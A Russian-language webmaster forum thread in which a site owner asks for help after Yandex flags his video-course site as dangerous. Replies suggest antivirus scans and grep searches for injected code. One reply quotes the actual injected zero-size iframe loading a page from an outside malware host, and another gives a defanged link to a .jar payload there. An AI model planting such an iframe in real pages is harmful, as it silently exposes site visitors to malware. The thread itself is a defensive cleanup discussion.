Форум Сайтостроение Веб-строительство

Вирус на сайте

123 4
Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
3590

Яндекс достал уже

1000 раз проверял все скрипты на сайте, а он все об одном: этот сайт может угорожать вашему здоровью:-)

У кого есть опыт устранения подобных причин?

Подскажите. Сайт поциент посвящен видеокурсам

Благодарность за помощь 10$

Я (http://agel-nash.ru) - вильгельм "ЗАКОЛЕБАТЕЛЬ" Аудит безопасности MODX сайтов (/ru/forum/783778) | Обучение созданию сайтов (http://modcoach.info/)
G6
На сайте с 12.07.2007
Offline
161
garry69
#1

У вас верусни там не один подгружает. Вот номер один

ladygaga . ipq . co / games / javaobe . jar

Растянул дабы не кликнули. Ищите фреймы или точнее незнакомый код вверху или внизу индексных.

Увидите сразу.

Дальше чистим комп, меняем пароли фтп и тд.

webrock
На сайте с 05.04.2010
Offline
261
webrock
#2

Что б ускорить поиск, сделайте бэкап сайта, скачайте и проверьте анивирем. А потом смотрите что антивирь нашёл и по указанным путям удаляйте всё "вшивое" на хосте.

Полный аудит сайтов. (/ru/forum/765361)
DyaDya
На сайте с 11.04.2007
Offline
147
DyaDya
#3
webrock:
Что б ускорить поиск, сделайте бэкап сайта, скачайте и проверьте анивирем. А потом смотрите что антивирь нашёл и по указанным путям удаляйте всё "вшивое" на хосте.

Так не всегда прокатывает. Антивири могут не видеть вирь в коде сайта, но опознавать при его подгрузке со стороннего сайта.

Странно, что гугл ещё не вывесел предупреждение о вире. Обычно он раньше яшки реагирует.

Нужно найти код, по которому можно определить вставку виря и прогнать поиском по всему сайту. Например, по SSH с помощью команд примерно такого вида:

find $PWD -name '*.*' -exec grep -li "iframe" {} \;
find $PWD -name '*.*' -exec grep -li "unescape" {} \;
и т.п.
Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
firefox19
На сайте с 05.11.2009
Offline
34
firefox19
#4

давайте ФТП, сделаю, не в первой

Ваши идеи - наша работа (http://yaweb.ru) Продам Сайт агентства недвижимости (/ru/forum/561489)
Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#5
DyaDya:
Так не всегда прокатывает. Антивири могут не видеть вирь в коде сайта, но опознавать при его подгрузке со стороннего сайта.
Странно, что гугл ещё не вывесел предупреждение о вире. Обычно он раньше яшки реагирует.

Нужно найти код, по которому можно определить вставку виря и прогнать поиском по всему сайту. Например, по SSH с помощью команд примерно такого вида:

Проверил все найденые файлы - все чисто....

webrock:
Что б ускорить поиск, сделайте бэкап сайта, скачайте и проверьте анивирем. А потом смотрите что антивирь нашёл и по указанным путям удаляйте всё "вшивое" на хосте.

Сделал. Проверил NOD32 + Microsoft Security Essentials = тишина

garry69:
У вас верусни там не один подгружает. Вот номер один
ladygaga . ipq . co / games / javaobe . jar
Растянул дабы не кликнули. Ищите фреймы или точнее незнакомый код вверху или внизу индексных.
Увидите сразу.
Дальше чистим комп, меняем пароли фтп и тд.

Хоть убей не вижу от куда подгружает... А какие еще? (можно в личнку)

Комп не то что чистил... Установил новую ОС (лицензия win7) + перехал но новый сервер (облако)...

G6
На сайте с 12.07.2007
Offline
161
garry69
#6

Хм, сейчас не грузит ничего. Странно что перманентно.

У вас не стоит ни каких всплывающих окон или рекламы подобной?

Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#7
garry69:
Хм, сейчас не грузит ничего. Странно что перманентно.
У вас не стоит ни каких всплывающих окон или рекламы подобной?

Нет. Кроме рекламы от бегуна больше ничего нет.

Более того, я не скажу что я новичек в вебе... Постоянно мониторю файлы на фак изменения (как по размеру, так и по дате)

G6
На сайте с 12.07.2007
Offline
161
garry69
#8

Из кода сохраненки гугла весь не привести из за длинны: 

<script type="text/javascript">

var rnumber = Math.floor(Math.random()*9999999);

var widget_so = new SWFObject("/assets/templates/video/tagcloud.swf?r="+rnumber, "tagcloudflash", "200", "200", "9", "#ffffff");

widget_so.addParam("allowScriptAccess", "always");widget_so.addVariable("tcolor", "0x333333");

widget_so.addVariable("tspeed", "115");

widget_so.addVariable("distr", "false");

widget_so.addVariable("mode", "tags");

widget_so.addVariable("tagcloud", "%3Ctags%3E%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B3%25D1%2580%25D0%25B0%25D0%25BC%25D0%25BC%25D0%25B8%25D1%2580%25D0%25BE%25D0%25B2%25D0%25B0%25D0%25BD%25D0%25B8%25D0%25B5%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%26quot%3B+%281%29%22%3E%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%258D%25D0%25BB%25D0%25B5%25D0%25BA%25D1%2582%25D1%2580%25D0%25BE%25D0%25B8%25D0%25BD%25D1%2581%25D1%2582%25D1%2580%25D1%2583%25D0%25BC%25D0%25B5%25D0%25BD%25D1%2582%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%8D%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%BE%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%26quot%3B+%281%29%22%3E%D1%8D%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%BE%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3Dphp%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3Bphp%26quot%3B+%281%29%22%3Ephp%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2581%25D0%25B0%25D0%25BA%25D1%2581%25D0%25BE%25D1%2584%25D0%25BE%25D0%25BD%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%81%D0%B0%D0%BA%D1%81%D0%BE%D1%84%D0%BE%D0%BD%26quot%3B+%281%29%22%3E%D1%81%D0%B0%D0%BA%D1%81%D0%BE%D1%84%D0%BE%D0%BD%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B8%25D0%25BC%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25B8%25D0%25B7%25D0%25B0%25D1%2586%25D0%25B8%25D1%258F%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B8%D0%BC%D0%BF%D1%80%D0%BE%D0%B2%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F%26quot%3B+%281%29%22%3E%D0%B8%D0%BC%D0%BF%D1%80%D0%BE%D0%B2%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2586%25D0%25B2%25D0%25B5%25D1%2582%25D1%258B%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%86%D0%B2%D0%B5%D1%82%D1%8B%26quot%3B+%281%29%22%3E%D1%86%D0%B2%D0%B5%D1%82%D1%8B%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2580%25D0%25B0%25D1%2581%25D1%2582%25D0%25B5%25D0%25BD%25D0%25B8%25D1%258F%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%80%D0%B0%D1%81%D1%82%D0%B5%D0%BD%D0%B8%D1%8F%26quot%3B+%281%29%22%3E%D1%80%D0%B0%D1%81%D1%82%D0%B5%D0%BD%D0%B8%D1%8F%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B8%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D1%2580%25D0%25B0%25D0%25BD%25D0%25BD%25D1%258B%25D0%25B9%2B%25D1%258F%25D0%25B7%25D1%258B%25D0%25BA%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B8%D0%BD%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9+%D1%8F%D0%B7%D1%8B%D0%BA%26quot%3B+%281%29%22%3E%D0%B8%D0%BD%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9+%D1%8F%D0%B7%D1%8B%D0%BA%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B0%25D0%25BD%25D0%25B3%25D0%25BB%25D0%25B8%25D0%25B9%25D1%2581%25D0%25BA%25D0%25B8%25D0%25B9%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9%26quot%3B+%281%29%22%3E%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B1%25D0%25BE%25D0%25BB%25D0%25B5%25D0%25B7%25D0%25BD%25D0%25B8%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B1%D0%BE%D0%BB%D0%B5%D0%B7%D0%BD%D0%B8%26quot%3B+%281%29%22%3E%D0%B1%D0%BE%D0%BB%D0%B5%D0%B7%D0%BD%D0%B8%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25BE%25D1%2582%25D0%25BE%25D0%25BF%25D0%25BB%25D0%25B5%25D0%25BD%25

widget_so.write("tags");</script>
Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#9
garry69:
Из кода сохраненки гугла весь не привести из за длинны: 
<script type="text/javascript">

var rnumber = Math.floor(Math.random()*9999999);

var widget_so = new SWFObject("/assets/templates/video/tagcloud.swf?r="+rnumber, "tagcloudflash", "200", "200", "9", "#ffffff");

widget_so.addParam("allowScriptAccess", "always");widget_so.addVariable("tcolor", "0x333333");

widget_so.addVariable("tspeed", "115");

widget_so.addVariable("distr", "false");

widget_so.addVariable("mode", "tags");

widget_so.addVariable("tagcloud", "%3Ctags%3E%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B3%25D1%2580%25D0%25B0%25D0%25BC%25D0%25BC%25D0%25B8%25D1%2580%25D0%25BE%25D0%25B2%25D0%25B0%25D0%25BD%25D0%25B8%25D0%25B5%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%26quot%3B+%281%29%22%3E%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%258D%25D0%25BB%25D0%25B5%25D0%25BA%25D1%2582%25D1%2580%25D0%25BE%25D0%25B8%25D0%25BD%25D1%2581%25D1%2582%25D1%2580%25D1%2583%25D0%25BC%25D0%25B5%25D0%25BD%25D1%2582%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%8D%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%BE%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%26quot%3B+%281%29%22%3E%D1%8D%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%BE%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3Dphp%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3Bphp%26quot%3B+%281%29%22%3Ephp%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2581%25D0%25B0%25D0%25BA%25D1%2581%25D0%25BE%25D1%2584%25D0%25BE%25D0%25BD%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%81%D0%B0%D0%BA%D1%81%D0%BE%D1%84%D0%BE%D0%BD%26quot%3B+%281%29%22%3E%D1%81%D0%B0%D0%BA%D1%81%D0%BE%D1%84%D0%BE%D0%BD%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B8%25D0%25BC%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25B8%25D0%25B7%25D0%25B0%25D1%2586%25D0%25B8%25D1%258F%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B8%D0%BC%D0%BF%D1%80%D0%BE%D0%B2%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F%26quot%3B+%281%29%22%3E%D0%B8%D0%BC%D0%BF%D1%80%D0%BE%D0%B2%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D1%8F%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2586%25D0%25B2%25D0%25B5%25D1%2582%25D1%258B%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%86%D0%B2%D0%B5%D1%82%D1%8B%26quot%3B+%281%29%22%3E%D1%86%D0%B2%D0%B5%D1%82%D1%8B%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D1%2580%25D0%25B0%25D1%2581%25D1%2582%25D0%25B5%25D0%25BD%25D0%25B8%25D1%258F%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D1%80%D0%B0%D1%81%D1%82%D0%B5%D0%BD%D0%B8%D1%8F%26quot%3B+%281%29%22%3E%D1%80%D0%B0%D1%81%D1%82%D0%B5%D0%BD%D0%B8%D1%8F%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B8%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D1%2580%25D0%25B0%25D0%25BD%25D0%25BD%25D1%258B%25D0%25B9%2B%25D1%258F%25D0%25B7%25D1%258B%25D0%25BA%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B8%D0%BD%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9+%D1%8F%D0%B7%D1%8B%D0%BA%26quot%3B+%281%29%22%3E%D0%B8%D0%BD%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9+%D1%8F%D0%B7%D1%8B%D0%BA%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B0%25D0%25BD%25D0%25B3%25D0%25BB%25D0%25B8%25D0%25B9%25D1%2581%25D0%25BA%25D0%25B8%25D0%25B9%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9%26quot%3B+%281%29%22%3E%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%B8%D0%B9%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25B1%25D0%25BE%25D0%25BB%25D0%25B5%25D0%25B7%25D0%25BD%25D0%25B8%22++style%3D%22font-size%3A+10pt%3B%22+title%3D%22Click+for++stories+about+%26quot%3B%D0%B1%D0%BE%D0%BB%D0%B5%D0%B7%D0%BD%D0%B8%26quot%3B+%281%29%22%3E%D0%B1%D0%BE%D0%BB%D0%B5%D0%B7%D0%BD%D0%B8%3C%2Fa%3E%0D%0A%3Ca+class%3D%22s1%22+href%3D%22%2Ftag%3Ftags%3D%25D0%25BE%25D1%2582%25D0%25BE%25D0%25BF%25D0%25BB%25D0%25B5%25D0%25BD%25

widget_so.write("tags");</script>

Это код облака тэгов. Я думал из-за него проблемы и удалил это дело...

НО! проблема осталась...

ДП
На сайте с 23.11.2009
Offline
203
Дикий пионер
#10

Тоже поучаствую


<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/2716654" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter --></div><div class="body">

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


<div class="headline">
<div class="logo"><h1>Видеокурсы</h1>обучение по видеоурокам</div>

Ищите откуда этот код выводится. Переводы строк добавил для лучшей видимости.

Кстати, фрейм есть только на первый заход, потом странички без него отдаются - так что какой-то скрипт у вас серверный этим руководит.

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий